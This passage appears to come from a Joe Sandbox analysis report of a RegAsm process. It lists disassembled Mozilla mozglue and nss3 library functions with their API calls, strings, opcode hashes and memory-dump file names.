                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC8DEE9
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CC7DEFD,?,6CC44A68), ref: 6CC8DF32
                                                                                      • Part of subcall function 6CC8DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CC8DB86
                                                                                      • Part of subcall function 6CC8DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CC8DC0E
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CC7DEFD,?,6CC44A68), ref: 6CC8DF65
                                                                                    • free.MOZGLUE(?), ref: 6CC8DF80
                                                                                      • Part of subcall function 6CC55E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC55EDB
                                                                                      • Part of subcall function 6CC55E90: memset.VCRUNTIME140(6CC97765,000000E5,55CCCCCC), ref: 6CC55F27
                                                                                      • Part of subcall function 6CC55E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC55FB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                    • String ID:
                                                                                    • API String ID: 112305417-0
                                                                                    • Opcode ID: 89edb802102ee76bc44afe8b9f298d2ed4ce44ddf5527cce7c8043b150dd35b1
                                                                                    • Instruction ID: b89c7cf48a436d5ee1bb91cefaf3e392a48f23cd081337e61372806747c15651
                                                                                    • Opcode Fuzzy Hash: 89edb802102ee76bc44afe8b9f298d2ed4ce44ddf5527cce7c8043b150dd35b1
                                                                                    • Instruction Fuzzy Hash: 9651C7727026029BD7119F18D8806AFB772BF9131CF95011ED45A53B00F731F85ACBA2
                                                                                    Function 6CC95D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95D32
                                                                                    • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95D62
                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95D6D
                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95D84
                                                                                    • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95DA4
                                                                                    • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95DC9
                                                                                    • std::_Facet_Register.LIBCPMT ref: 6CC95DDB
                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95E00
                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95E45
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                    • String ID:
                                                                                    • API String ID: 2325513730-0
                                                                                    • Opcode ID: 5cfedafd0c29329e258b3d6cc9f8e16e7e071290dbc790c8e474f7bf375af258
                                                                                    • Instruction ID: fb7876f300e37f58bd7c90a59601ddad3c929e030b0e8c0298208de06f187c6d
                                                                                    • Opcode Fuzzy Hash: 5cfedafd0c29329e258b3d6cc9f8e16e7e071290dbc790c8e474f7bf375af258
                                                                                    • Instruction Fuzzy Hash: 5941C2757002058FCB00DFA5C9D8AAE77B5FF89319F0441A8E50697791EB35EC06CB60
                                                                                    Function 6CC6CC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6CC331A7), ref: 6CC6CDDD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                    • API String ID: 4275171209-2186867486
                                                                                    • Opcode ID: 3b1509cdb8a27fc19319f1ec38b160d3553e756fc0d96ecbb2baaf9136e9b9d6
                                                                                    • Instruction ID: 7986fe24accd01d142f8e5c75f5376e31a01c2699bf7f5f4bf737bb9bf9e6cb9
                                                                                    • Opcode Fuzzy Hash: 3b1509cdb8a27fc19319f1ec38b160d3553e756fc0d96ecbb2baaf9136e9b9d6
                                                                                    • Instruction Fuzzy Hash: 4431A331B442055BEF10AFEA8DD5B6E7B75BF41B58F204019F610ABE80FB70E4018BA5
                                                                                    Function 6CC3ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6CC3F100: LoadLibraryW.KERNEL32(shell32,?,6CCAD020), ref: 6CC3F122
                                                                                      • Part of subcall function 6CC3F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CC3F132
                                                                                    • moz_xmalloc.MOZGLUE(00000012), ref: 6CC3ED50
                                                                                    • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC3EDAC
                                                                                    • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6CC3EDCC
                                                                                    • CreateFileW.KERNEL32 ref: 6CC3EE08
                                                                                    • free.MOZGLUE(00000000), ref: 6CC3EE27
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CC3EE32
                                                                                      • Part of subcall function 6CC3EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6CC3EBB5
                                                                                      • Part of subcall function 6CC3EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6CC6D7F3), ref: 6CC3EBC3
                                                                                      • Part of subcall function 6CC3EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6CC6D7F3), ref: 6CC3EBD6
                                                                                    Strings
                                                                                    • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6CC3EDC1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                    • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                    • API String ID: 1980384892-344433685
                                                                                    • Opcode ID: 16ad29734e63e0849865ad23842afd8107fa41eaa2676d7c1b81d95605e19852
                                                                                    • Instruction ID: 354f9080f5a777a7a32b0881fcf449c7172278be4387c5a7896af4fb334c207f
                                                                                    • Opcode Fuzzy Hash: 16ad29734e63e0849865ad23842afd8107fa41eaa2676d7c1b81d95605e19852
                                                                                    • Instruction Fuzzy Hash: 7C51E171D052248BDB01DF69E8447EEB7B0AF49318F44946DE8596B780FB306D48CBE2
                                                                                    Function 6CCAA520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CCAA565
                                                                                      • Part of subcall function 6CCAA470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CCAA4BE
                                                                                      • Part of subcall function 6CCAA470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CCAA4D6
                                                                                    • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6CCAA65B
                                                                                    • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CCAA6B6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                                    • String ID: 0$z
                                                                                    • API String ID: 310210123-2584888582
                                                                                    • Opcode ID: 62c5bfb3ce3c1f6339342200d8de82d976632163274a50ef74e37e6af8f6e15a
                                                                                    • Instruction ID: 74045c2f84009e951ddcc6ffd6cb30ab87bc731c806c9c0f1cdbaf8611a03efe
                                                                                    • Opcode Fuzzy Hash: 62c5bfb3ce3c1f6339342200d8de82d976632163274a50ef74e37e6af8f6e15a
                                                                                    • Instruction Fuzzy Hash: 774138719087469FC341DF69C480A8BBBE4BFC9354F409A2EF49987650EB30D549CF92
                                                                                    Function 6CD68CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • TlsGetValue.KERNEL32(00000000,00000000,?,6CD7124D,00000001), ref: 6CD68D19
                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,6CD7124D,00000001), ref: 6CD68D32
                                                                                    • PL_ArenaRelease.NSS3(?,?,?,?,?,6CD7124D,00000001), ref: 6CD68D73
                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,6CD7124D,00000001), ref: 6CD68D8C
                                                                                      • Part of subcall function 6CDFDD70: TlsGetValue.KERNEL32 ref: 6CDFDD8C
                                                                                      • Part of subcall function 6CDFDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CDFDDB4
                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,6CD7124D,00000001), ref: 6CD68DBA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537699692.000000006CCD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CCD0000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537650615.000000006CCD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538473689.000000006CEAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538508502.000000006CEAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538542365.000000006CEB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538578827.000000006CEB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6ccd0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                    • String ID: KRAM$KRAM
                                                                                    • API String ID: 2419422920-169145855
                                                                                    • Opcode ID: 97f56636821e88c2f260da3b282a3c801f03281485639fa0946cf671bc458f3d
                                                                                    • Instruction ID: 13f400825c8848603f80f3a7c7a7b32a7bb6614923d512790c28f039faef255d
                                                                                    • Opcode Fuzzy Hash: 97f56636821e88c2f260da3b282a3c801f03281485639fa0946cf671bc458f3d
                                                                                    • Instruction Fuzzy Hash: 28216DB5A04601CFCB00EF7AC88466AB7F0FF56318F15896AD99887B11E735D842CFA1
                                                                                    Function 6CC378C0 Relevance: 12.3, APIs: 8, Instructions: 320COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • free.MOZGLUE(?,6CCB008B), ref: 6CC37B89
                                                                                    • free.MOZGLUE(?,6CCB008B), ref: 6CC37BAC
                                                                                      • Part of subcall function 6CC378C0: free.MOZGLUE(?,6CCB008B), ref: 6CC37BCF
                                                                                    • free.MOZGLUE(?,6CCB008B), ref: 6CC37BF2
                                                                                      • Part of subcall function 6CC55E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC55EDB
                                                                                      • Part of subcall function 6CC55E90: memset.VCRUNTIME140(6CC97765,000000E5,55CCCCCC), ref: 6CC55F27
                                                                                      • Part of subcall function 6CC55E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC55FB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$CriticalSection$EnterLeavememset
                                                                                    • String ID:
                                                                                    • API String ID: 3977402767-0
                                                                                    • Opcode ID: d06a90c288bb6f93bfbe0784987deff49d495643f856a02ef4b03e2eb2266cf7
                                                                                    • Instruction ID: 94fc221fc54e36b0e03f0871115498ac6b8cf9ea2f29b3b7a77180aeac3681d0
                                                                                    • Opcode Fuzzy Hash: d06a90c288bb6f93bfbe0784987deff49d495643f856a02ef4b03e2eb2266cf7
                                                                                    • Instruction Fuzzy Hash: DDC18071E01138CBEB248B28EE90B9DB772BF41318F1512E9D41EA7BC1E7319E859B51
                                                                                    Function 6CC79420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                                      • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                                    Strings
                                                                                    • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CC7946B
                                                                                    • MOZ_BASE_PROFILER_LOGGING, xrefs: 6CC7947D
                                                                                    • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CC79459
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                    • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                    • API String ID: 4042361484-1628757462
                                                                                    • Opcode ID: 24a4c84fa9a339ab5e3b80b294ac612a864d47757d11aa5c1a6909d4d07a41d3
                                                                                    • Instruction ID: 63acdb4d6b6662022c5f0db05e13659c80985077e483b14b10a7b90a70b1da63
                                                                                    • Opcode Fuzzy Hash: 24a4c84fa9a339ab5e3b80b294ac612a864d47757d11aa5c1a6909d4d07a41d3
                                                                                    • Instruction Fuzzy Hash: 2B01D478A001018BD7109BEDE915A4673B5EB46328F040536E90AA7F41F731E8658D6F
                                                                                    Function 6CC80F40 Relevance: 12.2, APIs: 8, Instructions: 171threadtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC80F6B
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC80F88
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC80FF7
                                                                                    • InitializeConditionVariable.KERNEL32(?), ref: 6CC81067
                                                                                    • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6CC810A7
                                                                                    • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6CC8114B
                                                                                      • Part of subcall function 6CC78AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6CC91563), ref: 6CC78BD5
                                                                                    • free.MOZGLUE(?), ref: 6CC81174
                                                                                    • free.MOZGLUE(?), ref: 6CC81186
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                                    • String ID:
                                                                                    • API String ID: 2803333873-0
                                                                                    • Opcode ID: f810ba0a3f8ae8bbdafab63bcb787269c7c04e690e0794fdf3ed72608c7c8fe5
                                                                                    • Instruction ID: 64f9b00a6d3357b35b803c6954f0ac9508f127866138a43e8a23e8d8222193c1
                                                                                    • Opcode Fuzzy Hash: f810ba0a3f8ae8bbdafab63bcb787269c7c04e690e0794fdf3ed72608c7c8fe5
                                                                                    • Instruction Fuzzy Hash: B361AD75A063409BDB10CF25C880B9BBBF6BFC5308F14891DE89987711EB71E949CB81
                                                                                    Function 6CC3E9C0 Relevance: 12.1, APIs: 8, Instructions: 133COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(?,?,?,6CC41999), ref: 6CC3EA39
                                                                                    • memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6CC3EA5C
                                                                                    • memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6CC3EA76
                                                                                    • moz_xmalloc.MOZGLUE(-00000001,?,?,6CC41999), ref: 6CC3EA9D
                                                                                    • memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6CC41999), ref: 6CC3EAC2
                                                                                    • memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6CC3EADC
                                                                                    • free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6CC3EB0B
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6CC3EB27
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                                    • String ID:
                                                                                    • API String ID: 706364981-0
                                                                                    • Opcode ID: 96ef0822f53e501e32504048c77324650007e9c4cdad27e8a0987a03a6821992
                                                                                    • Instruction ID: b9313526c5eeeff951eeeb50a0357a6673782edaa038a4f8b279caa98240f4cf
                                                                                    • Opcode Fuzzy Hash: 96ef0822f53e501e32504048c77324650007e9c4cdad27e8a0987a03a6821992
                                                                                    • Instruction Fuzzy Hash: 594193B1A002269FDB14CFA8DC80AAE7BA4FF45358F240628E819D7794F731DD4587D5
                                                                                    Function 6CC3B630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(?,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B6AC
                                                                                      • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B6D1
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B6E3
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B70B
                                                                                    • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B71D
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6CC3B61E), ref: 6CC3B73F
                                                                                    • moz_xmalloc.MOZGLUE(80000023,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B760
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B79A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 1394714614-0
                                                                                    • Opcode ID: 51544dc9f21d85414a50ff5d69228bc5f52bae0b60e8556c42af2da1aae39e42
                                                                                    • Instruction ID: 297e0ebdf178e551a262bbd8912b0ef863c13781515873c65bef4c66bd142892
                                                                                    • Opcode Fuzzy Hash: 51544dc9f21d85414a50ff5d69228bc5f52bae0b60e8556c42af2da1aae39e42
                                                                                    • Instruction Fuzzy Hash: 7941E3B2D005259FCB04DF68EC945AEB7B5FB45320F250629E829E7780F731A9048BE1
                                                                                    Function 6CC3EF30 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(6CCB5104), ref: 6CC3EFAC
                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CC3EFD7
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC3EFEC
                                                                                    • free.MOZGLUE(?), ref: 6CC3F00C
                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CC3F02E
                                                                                    • memcpy.VCRUNTIME140(00000000,?), ref: 6CC3F041
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC3F065
